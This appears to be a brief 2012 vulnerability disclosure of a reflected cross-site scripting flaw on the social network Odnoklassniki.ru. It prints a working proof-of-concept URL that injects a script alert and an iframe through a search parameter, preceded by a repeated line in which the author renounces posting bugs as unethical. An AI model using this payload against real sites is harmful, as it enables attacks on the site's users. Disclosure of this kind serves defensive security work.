Reason?
I will not post any bugs in the future, because I changed my views on this and now consider it to be unethical.
I will not post any bugs in the future, because I changed my views on this and now consider it to be unethical.
# Date: 15.04.2012 # Author: Sony and Flexxpoint # Web Browser : Mozilla Firefox # Sony Blog: http://st2tea.blogspot.com # Flexxpoint Blog: http://flexxpoint.blogspot.com/
# PoC:
http://st2tea.blogspot.com/2012/04/odnoklassnikiru-cross-site-scripting.html
..................................................................
Well, we have a cross site scripting on Odnoklassniki.ru
http://www.odnoklassniki.ru/dk?st.cmd=appSearchResultList&st.isEmpty=off&st.query=%22%22%3E%3Cscript%3Ealert%28%22Odnoklassniki.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Ciframe%20src=%22http://xssed.com%22%3E
or
http://codepad.org/kKjrrn76